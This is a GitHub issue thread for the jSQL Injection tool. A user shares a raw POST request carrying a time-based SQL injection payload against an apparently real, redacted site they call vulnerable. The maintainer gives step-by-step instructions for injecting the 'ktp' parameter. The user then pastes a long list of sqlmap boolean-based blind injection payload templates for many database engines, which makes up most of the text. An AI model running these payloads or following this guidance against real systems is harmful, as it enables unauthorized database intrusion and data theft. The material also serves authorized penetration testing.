Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

can you make option parameter for support post request injection sql #95871

Open
selectfromblackhydra opened this issue Jan 20, 2025 · 5 comments
Open

can you make option parameter for support post request injection sql #95871

selectfromblackhydra opened this issue Jan 20, 2025 · 5 comments

Comments

@selectfromblackhydra
Copy link

post sql injection need parameter to test sql injection in post request because if not in my case sql injection not inject or false positive can you add subquery sql injection like sqlmap because in my case injection is vuln with subquery injection boolean blind thank you
@ron190
Copy link
Owner

ron190 commented Jan 21, 2025

  • Sure, just deploy the advanced panel with the chevron on the right, then select radio for POST on the left:

Image

  • Can you be more specific with a error message or a detailed context ?

Strategy Blind should work too, you can debug logs in tab Network to track the issue. You can also share the sqlmap option tag you are using if you are refering to a specific tag.

@selectfromblackhydra
Copy link
Author

i mean can you support post like this.

POST /forgot_action.php HTTP/1.1
Host: redacted
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=>
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) Appl>
Connection: close
Cache-Control: max-age=0
Cookie: PHPSESSID=fqn1cf8c9aoompe9brgkqr8jn9
Origin: redacted
Upgrade-Insecure-Requests: 1
Referer: redacted.>
Content-Type: application/x-www-form-urlencoded
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="130",>
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Content-Length: 21

ktp=BoSUhm'%2b(select*from(select(sleep(20)))a)%2b'&nik=BoSUh>

@selectfromblackhydra
Copy link
Author

selectfromblackhydra commented Jan 22, 2025
edited
Loading

this target is vuln but no waf but i have problem connection without correct parameter is ktp in sqlmap i dont now in jsql

@ron190
Copy link
Owner

ron190 commented Jan 22, 2025

I know people uses similar block template, so I'll see if it's possible to integrate it properly, though in jSQL your template is equivalent to what is on the screenshot:

Image

  • Set the <url>/forgot_action.php in address bar
  • Select the POST radio
  • ⚠ 👉 Copy/paste the request parameters but reverse it to nik=&ktp= to inject ktp, of check option Inject every Request params in Preference 👈 ⚠
  • Copy/paste the block Host to Content-Length into header parameter, use the right button to open the modal

Also you may require a proper active session for Cookie: PHPSESSID=, depending on the service tested.

@selectfromblackhydra
Copy link
Author

hey ron maybe you want learn sqlmap payload i have the file here This XML file does not appear to have any style information associated with it. The document tree is shown below.

<title>AND boolean-based blind - WHERE or HAVING clause</title> 1 1 1 1,8,9 1 AND [INFERENCE] AND [RANDNUM]=[RANDNUM] AND [RANDNUM]=[RANDNUM1] <title>OR boolean-based blind - WHERE or HAVING clause</title> 1 1 3 1,9 2 OR [INFERENCE] OR [RANDNUM]=[RANDNUM] OR [RANDNUM]=[RANDNUM1] <title>OR boolean-based blind - WHERE or HAVING clause (NOT)</title> 1 3 3 1,9 1 OR NOT [INFERENCE] OR NOT [RANDNUM]=[RANDNUM] OR NOT [RANDNUM]=[RANDNUM1] <title>AND boolean-based blind - WHERE or HAVING clause (subquery - comment)</title> 1 2 1 1,8,9 1 AND [RANDNUM]=(SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE (SELECT [RANDNUM1] UNION SELECT [RANDNUM2]) END)) AND [RANDNUM]=(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE (SELECT [RANDNUM1] UNION SELECT [RANDNUM2]) END)) [GENERIC_SQL_COMMENT] AND [RANDNUM]=(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE (SELECT [RANDNUM1] UNION SELECT [RANDNUM2]) END)) <title>OR boolean-based blind - WHERE or HAVING clause (subquery - comment)</title> 1 2 3 1,9 2 OR [RANDNUM]=(SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE (SELECT [RANDNUM1] UNION SELECT [RANDNUM2]) END)) OR [RANDNUM]=(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE (SELECT [RANDNUM1] UNION SELECT [RANDNUM2]) END)) [GENERIC_SQL_COMMENT] OR [RANDNUM]=(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE (SELECT [RANDNUM1] UNION SELECT [RANDNUM2]) END)) <title>AND boolean-based blind - WHERE or HAVING clause (comment)</title> 1 2 1 1 1 AND [INFERENCE] AND [RANDNUM]=[RANDNUM] [GENERIC_SQL_COMMENT] AND [RANDNUM]=[RANDNUM1] <title>OR boolean-based blind - WHERE or HAVING clause (comment)</title> 1 2 3 1 2 OR [INFERENCE] OR [RANDNUM]=[RANDNUM] [GENERIC_SQL_COMMENT] OR [RANDNUM]=[RANDNUM1] <title>OR boolean-based blind - WHERE or HAVING clause (NOT - comment)</title> 1 4 3 1 1 OR NOT [INFERENCE] OR NOT [RANDNUM]=[RANDNUM] [GENERIC_SQL_COMMENT] OR NOT [RANDNUM]=[RANDNUM1] <title>AND boolean-based blind - WHERE or HAVING clause (MySQL comment)</title> 1 3 1 1 1 AND [INFERENCE] AND [RANDNUM]=[RANDNUM] # AND [RANDNUM]=[RANDNUM1]
MySQL
<title>OR boolean-based blind - WHERE or HAVING clause (MySQL comment)</title> 1 3 3 1 2 OR [INFERENCE] OR [RANDNUM]=[RANDNUM] # OR [RANDNUM]=[RANDNUM1]
MySQL
<title>OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)</title> 1 3 3 1 1 OR NOT [INFERENCE] OR NOT [RANDNUM]=[RANDNUM] # OR NOT [RANDNUM]=[RANDNUM1]
MySQL
<title>AND boolean-based blind - WHERE or HAVING clause (Microsoft Access comment)</title> 1 3 1 1 1 AND [INFERENCE] AND [RANDNUM]=[RANDNUM] %16 AND [RANDNUM]=[RANDNUM1]
Microsoft Access
<title>OR boolean-based blind - WHERE or HAVING clause (Microsoft Access comment)</title> 1 3 3 1 2 OR [INFERENCE] OR [RANDNUM]=[RANDNUM] %16 OR [RANDNUM]=[RANDNUM1]
Microsoft Access
<title>MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause</title> 1 2 1 1,2,3 1 RLIKE (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE 0x28 END)) RLIKE (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE 0x28 END)) RLIKE (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE 0x28 END))
MySQL
<title>MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)</title> 1 3 1 1,2,3,8 1 AND MAKE_SET([INFERENCE],[RANDNUM]) AND MAKE_SET([RANDNUM]=[RANDNUM],[RANDNUM1]) AND MAKE_SET([RANDNUM]=[RANDNUM1],[RANDNUM1])
MySQL
<title>MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)</title> 1 3 3 1,2,3 2 OR MAKE_SET([INFERENCE],[RANDNUM]) OR MAKE_SET([RANDNUM]=[RANDNUM],[RANDNUM1]) OR MAKE_SET([RANDNUM]=[RANDNUM1],[RANDNUM1])
MySQL
<title>MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (ELT)</title> 1 4 1 1,2,3,8 1 AND ELT([INFERENCE],[RANDNUM]) AND ELT([RANDNUM]=[RANDNUM],[RANDNUM1]) AND ELT([RANDNUM]=[RANDNUM1],[RANDNUM1])
MySQL
<title>MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (ELT)</title> 1 4 3 1,2,3 2 OR ELT([INFERENCE],[RANDNUM]) OR ELT([RANDNUM]=[RANDNUM],[RANDNUM1]) OR ELT([RANDNUM]=[RANDNUM1],[RANDNUM1])
MySQL
<title>MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)</title> 1 5 1 1,2,3,8 1 AND EXTRACTVALUE([RANDNUM],CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE 0x3A END) AND EXTRACTVALUE([RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE 0x3A END) AND EXTRACTVALUE([RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE 0x3A END)
MySQL
<title>MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)</title> 1 5 3 1,2,3,8 2 OR EXTRACTVALUE([RANDNUM],CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE 0x3A END) OR EXTRACTVALUE([RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE 0x3A END) OR EXTRACTVALUE([RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE 0x3A END)
MySQL
<title>PostgreSQL AND boolean-based blind - WHERE or HAVING clause (CAST)</title> 1 2 1 1,8 1 AND (SELECT (CASE WHEN ([INFERENCE]) THEN NULL ELSE CAST('[RANDSTR]' AS NUMERIC) END)) IS NULL AND (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN NULL ELSE CAST('[RANDSTR]' AS NUMERIC) END)) IS NULL AND (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN NULL ELSE CAST('[RANDSTR]' AS NUMERIC) END)) IS NULL
PostgreSQL
<title>PostgreSQL OR boolean-based blind - WHERE or HAVING clause (CAST)</title> 1 3 3 1 2 OR (SELECT (CASE WHEN ([INFERENCE]) THEN NULL ELSE CAST('[RANDSTR]' AS NUMERIC) END)) IS NULL OR (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN NULL ELSE CAST('[RANDSTR]' AS NUMERIC) END)) IS NULL OR (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN NULL ELSE CAST('[RANDSTR]' AS NUMERIC) END)) IS NULL
PostgreSQL
<title>Oracle AND boolean-based blind - WHERE or HAVING clause (CTXSYS.DRITHSX.SN)</title> 1 2 1 1 1 AND (SELECT (CASE WHEN ([INFERENCE]) THEN NULL ELSE CTXSYS.DRITHSX.SN(1,[RANDNUM]) END) FROM DUAL) IS NULL AND (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN NULL ELSE CTXSYS.DRITHSX.SN(1,[RANDNUM]) END) FROM DUAL) IS NULL AND (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN NULL ELSE CTXSYS.DRITHSX.SN(1,[RANDNUM]) END) FROM DUAL) IS NULL
Oracle
<title>Oracle OR boolean-based blind - WHERE or HAVING clause (CTXSYS.DRITHSX.SN)</title> 1 3 3 1 2 OR (SELECT (CASE WHEN ([INFERENCE]) THEN NULL ELSE CTXSYS.DRITHSX.SN(1,[RANDNUM]) END) FROM DUAL) IS NULL OR (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN NULL ELSE CTXSYS.DRITHSX.SN(1,[RANDNUM]) END) FROM DUAL) IS NULL OR (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN NULL ELSE CTXSYS.DRITHSX.SN(1,[RANDNUM]) END) FROM DUAL) IS NULL
Oracle
<title>SQLite AND boolean-based blind - WHERE, HAVING, GROUP BY or HAVING clause (JSON)</title> 1 2 1 1 1 AND CASE WHEN [INFERENCE] THEN [RANDNUM] ELSE JSON('[RANDSTR]') END AND CASE WHEN [RANDNUM]=[RANDNUM] THEN [RANDNUM] ELSE JSON('[RANDSTR]') END AND CASE WHEN [RANDNUM]=[RANDNUM1] THEN [RANDNUM] ELSE JSON('[RANDSTR]') END
SQLite
<title>SQLite OR boolean-based blind - WHERE, HAVING, GROUP BY or HAVING clause (JSON)</title> 1 3 3 1 2 OR CASE WHEN [INFERENCE] THEN [RANDNUM] ELSE JSON('[RANDSTR]') END OR CASE WHEN [RANDNUM]=[RANDNUM] THEN [RANDNUM] ELSE JSON('[RANDSTR]') END OR CASE WHEN [RANDNUM]=[RANDNUM1] THEN [RANDNUM] ELSE JSON('[RANDSTR]') END
SQLite
<title>Boolean-based blind - Parameter replace (original value)</title> 1 1 1 1,2,3 3 (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE (SELECT [RANDNUM1] UNION SELECT [RANDNUM2]) END)) (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE (SELECT [RANDNUM1] UNION SELECT [RANDNUM2]) END)) (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE (SELECT [RANDNUM1] UNION SELECT [RANDNUM2]) END)) <title>MySQL boolean-based blind - Parameter replace (MAKE_SET)</title> 1 4 1 1,2,3 3 MAKE_SET([INFERENCE],[RANDNUM]) MAKE_SET([RANDNUM]=[RANDNUM],[RANDNUM1]) MAKE_SET([RANDNUM]=[RANDNUM1],[RANDNUM1])
MySQL
<title>MySQL boolean-based blind - Parameter replace (MAKE_SET - original value)</title> 1 5 1 1,2,3 3 MAKE_SET([INFERENCE],[ORIGVALUE]) MAKE_SET([RANDNUM]=[RANDNUM],[ORIGVALUE]) MAKE_SET([RANDNUM]=[RANDNUM1],[ORIGVALUE])
MySQL
<title>MySQL boolean-based blind - Parameter replace (ELT)</title> 1 4 1 1,2,3 3 ELT([INFERENCE],[RANDNUM]) ELT([RANDNUM]=[RANDNUM],[RANDNUM1]) ELT([RANDNUM]=[RANDNUM1],[RANDNUM1])
MySQL
<title>MySQL boolean-based blind - Parameter replace (ELT - original value)</title> 1 5 1 1,2,3 3 ELT([INFERENCE],[ORIGVALUE]) ELT([RANDNUM]=[RANDNUM],[ORIGVALUE]) ELT([RANDNUM]=[RANDNUM1],[ORIGVALUE])
MySQL
<title>MySQL boolean-based blind - Parameter replace (bool*int)</title> 1 4 1 1,2,3 3 ([INFERENCE])*[RANDNUM] ([RANDNUM]=[RANDNUM])*[RANDNUM1] ([RANDNUM]=[RANDNUM1])*[RANDNUM1]
MySQL
<title>MySQL boolean-based blind - Parameter replace (bool*int - original value)</title> 1 5 1 1,2,3 3 ([INFERENCE])*[ORIGVALUE] ([RANDNUM]=[RANDNUM])*[ORIGVALUE] ([RANDNUM]=[RANDNUM1])*[ORIGVALUE]
MySQL
<title>PostgreSQL boolean-based blind - Parameter replace</title> 1 3 1 1,2,3 3 (SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE 1/(SELECT 0) END)) (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE 1/(SELECT 0) END)) (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE 1/(SELECT 0) END))
PostgreSQL
<title>PostgreSQL boolean-based blind - Parameter replace (original value)</title> 1 4 1 1,2,3 3 (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE 1/(SELECT 0) END)) (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE 1/(SELECT 0) END)) (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE 1/(SELECT 0) END))
PostgreSQL
<title>PostgreSQL boolean-based blind - Parameter replace (GENERATE_SERIES)</title> 1 5 1 1,2,3 3 (SELECT * FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([INFERENCE]) THEN 1 ELSE 0 END) LIMIT 1) (SELECT * FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) LIMIT 1) (SELECT * FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE 0 END) LIMIT 1)
PostgreSQL
<title>PostgreSQL boolean-based blind - Parameter replace (GENERATE_SERIES - original value)</title> 1 5 1 1,2,3 3 (SELECT [ORIGVALUE] FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([INFERENCE]) THEN 1 ELSE 0 END) LIMIT 1) (SELECT [ORIGVALUE] FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) LIMIT 1) (SELECT [ORIGVALUE] FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE 0 END) LIMIT 1)
PostgreSQL
<title>Microsoft SQL Server/Sybase boolean-based blind - Parameter replace</title> 1 3 1 1,3 3 (SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] UNION ALL SELECT [RANDNUM1]) END)) (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] UNION ALL SELECT [RANDNUM1]) END)) (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] UNION ALL SELECT [RANDNUM1]) END))
Microsoft SQL Server Sybase
<title>Microsoft SQL Server/Sybase boolean-based blind - Parameter replace (original value)</title> 1 4 1 1,3 3 (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] UNION ALL SELECT [RANDNUM1]) END)) (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] UNION ALL SELECT [RANDNUM1]) END)) (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] UNION ALL SELECT [RANDNUM1]) END))
Microsoft SQL Server Sybase
<title>Oracle boolean-based blind - Parameter replace</title> 1 3 1 1,3 3 (SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL) (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL) (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL)
Oracle
<title>Oracle boolean-based blind - Parameter replace (original value)</title> 1 4 1 1,3 3 (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL) (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL) (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL)
Oracle
<title>Informix boolean-based blind - Parameter replace</title> 1 3 1 1,3 3 (SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE 1/0 END) FROM SYSMASTER:SYSDUAL) (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE 1/0 END) FROM SYSMASTER:SYSDUAL) (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE 1/0 END) FROM SYSMASTER:SYSDUAL)
Informix
<title>Informix boolean-based blind - Parameter replace (original value)</title> 1 4 1 1,3 3 (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE [RANDNUM] END) FROM SYSMASTER:SYSDUAL) (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM] END) FROM SYSMASTER:SYSDUAL) (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM] END) FROM SYSMASTER:SYSDUAL)
Informix
<title>Microsoft Access boolean-based blind - Parameter replace</title> 1 3 1 1,3 3 IIF([INFERENCE],[RANDNUM],1/0) IIF([RANDNUM]=[RANDNUM],[RANDNUM],1/0) IIF([RANDNUM]=[RANDNUM1],[RANDNUM],1/0)
Microsoft Access
<title>Microsoft Access boolean-based blind - Parameter replace (original value)</title> 1 4 1 1,3 3 IIF([INFERENCE],[ORIGVALUE],1/0) IIF([RANDNUM]=[RANDNUM],[ORIGVALUE],1/0) IIF([RANDNUM]=[RANDNUM1],[ORIGVALUE],1/0)
Microsoft Access
<title>Boolean-based blind - Parameter replace (DUAL)</title> 1 2 1 1,2,3 3 (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM DUAL UNION SELECT [RANDNUM1] FROM DUAL) END) (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM DUAL UNION SELECT [RANDNUM1] FROM DUAL) END) (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM DUAL UNION SELECT [RANDNUM1] FROM DUAL) END) <title>Boolean-based blind - Parameter replace (DUAL - original value)</title> 1 3 1 1,2,3 3 (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM DUAL UNION SELECT [RANDNUM1] FROM DUAL) END) (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM DUAL UNION SELECT [RANDNUM1] FROM DUAL) END) (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM DUAL UNION SELECT [RANDNUM1] FROM DUAL) END) <title>Boolean-based blind - Parameter replace (CASE)</title> 1 2 1 1,3 3 (CASE WHEN [INFERENCE] THEN [RANDNUM] ELSE NULL END) (CASE WHEN [RANDNUM]=[RANDNUM] THEN [RANDNUM] ELSE NULL END) (CASE WHEN [RANDNUM]=[RANDNUM1] THEN [RANDNUM] ELSE NULL END) <title>Boolean-based blind - Parameter replace (CASE - original value)</title> 1 3 1 1,3 3 (CASE WHEN [INFERENCE] THEN [ORIGVALUE] ELSE NULL END) (CASE WHEN [RANDNUM]=[RANDNUM] THEN [ORIGVALUE] ELSE NULL END) (CASE WHEN [RANDNUM]=[RANDNUM1] THEN [ORIGVALUE] ELSE NULL END) <title>MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause</title> 1 2 1 2,3 1 ,(SELECT (CASE WHEN ([INFERENCE]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END)) ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END)) ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END))
MySQL >= 5.0
<title>MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause (original value)</title> 1 3 1 2,3 1 ,(SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END)) ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END)) ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END))
MySQL >= 5.0
<title>MySQL < 5.0 boolean-based blind - ORDER BY, GROUP BY clause</title> 1 3 1 2,3 1 ,(SELECT (CASE WHEN ([INFERENCE]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END)) ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END)) ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END))
MySQL < 5.0
<title>MySQL < 5.0 boolean-based blind - ORDER BY, GROUP BY clause (original value)</title> 1 4 1 2,3 1 ,(SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END)) ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END)) ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END))
MySQL < 5.0
<title>PostgreSQL boolean-based blind - ORDER BY, GROUP BY clause</title> 1 2 1 2,3 1 ,(SELECT (CASE WHEN ([INFERENCE]) THEN 1 ELSE 1/(SELECT 0) END)) ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 1/(SELECT 0) END)) ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE 1/(SELECT 0) END))
PostgreSQL
<title>PostgreSQL boolean-based blind - ORDER BY clause (original value)</title> 1 4 1 3 1 ,(SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE 1/(SELECT 0) END)) ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE 1/(SELECT 0) END)) ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE 1/(SELECT 0) END))
PostgreSQL
<title>PostgreSQL boolean-based blind - ORDER BY clause (GENERATE_SERIES)</title> 1 5 1 3 1 ,(SELECT * FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([INFERENCE]) THEN 1 ELSE 0 END) LIMIT 1) ,(SELECT * FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) LIMIT 1) ,(SELECT * FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE 0 END) LIMIT 1)
PostgreSQL
<title>Microsoft SQL Server/Sybase boolean-based blind - ORDER BY clause</title> 1 3 1 3 1 ,(SELECT (CASE WHEN ([INFERENCE]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] UNION ALL SELECT [RANDNUM1]) END)) ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] UNION ALL SELECT [RANDNUM1]) END)) ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] UNION ALL SELECT [RANDNUM1]) END))
Microsoft SQL Server Sybase
<title>Microsoft SQL Server/Sybase boolean-based blind - ORDER BY clause (original value)</title> 1 4 1 3 1 ,(SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] UNION ALL SELECT [RANDNUM1]) END)) ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] UNION ALL SELECT [RANDNUM1]) END)) ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] UNION ALL SELECT [RANDNUM1]) END))
Microsoft SQL Server Sybase
<title>Oracle boolean-based blind - ORDER BY, GROUP BY clause</title> 1 3 1 2,3 1 ,(SELECT (CASE WHEN ([INFERENCE]) THEN 1 ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL) ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL) ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL)
Oracle
<title>Oracle boolean-based blind - ORDER BY, GROUP BY clause (original value)</title> 1 4 1 2,3 1 ,(SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL) ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL) ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL)
Oracle
